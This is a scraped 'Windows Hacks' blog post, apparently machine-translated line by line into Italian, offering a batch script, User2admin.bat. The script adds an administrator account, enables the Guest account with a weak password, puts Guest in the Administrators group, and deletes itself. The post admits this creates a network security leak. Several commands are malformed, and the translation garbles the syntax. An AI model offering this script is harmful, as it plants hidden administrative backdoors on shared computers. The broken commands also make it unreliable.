Want to convert a user account into an Admin? Desidera convertire un account utente in un amministratore?
Want to convert a user account into an Admin? Desidera convertire un account utente in un amministratore?
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop. Tutto quello che dovete fare è copiare il codice qui sotto, copia / incolla in Blocco note e salvarlo come User2admin.bat sul tuo desktop.
echo off echo off
title Please wait… titolo Vi preghiamo di attendere…
cls CLS
net user add Username Password /add net user aggiungere Nome utente Password / add
net user localgroup Administrators Username /add net localgroup Administrators utente Nome utente / aggiungere
net user Guest 420 /active:yes net user Valutazione 420 / attivi: sì
net localgroup Guests Guest /DELETE net localgroup ospiti Valutazione / DELETE
net localgroup Administrators Guest /add net localgroup Administrators Valutazione / add
del %0 Del% 0
Double-click the file to execute or type the above-given code in Command Prompt. Fare doppio clic sul file per eseguire o del tipo sopra determinato codice in Prompt dei comandi.
Note: this also creates a net account which is also accessable through nets open port (basically it’sa security leak). Nota: questo crea anche una rete conto che è anche accessibile attraverso reti aprire la porta (sostanzialmente si tratta di una fuga di sicurezza).
Popularity: 1% Popularity: 1%
Written by magakos. Scritto da magakos. Read more great feeds at is source Per saperne di più grande al feed è fonte WEBSITE SITO WEB
no comments nessun commento . .
Read more articles on Per saperne di più articoli su Scripts Script and e WindowS HackS Windows Hacks and e All Tutto and e otherSoftware otherSoftware . .
- [+] Digg [+] Digg : Feature this article : Feature questo articolo
- [+] Del.icio.us [+] Del.icio.us : Bookmark this article : Bookmark questo articolo
- [+] Furl [+] Furl : Bookmark this article : Bookmark questo articolo















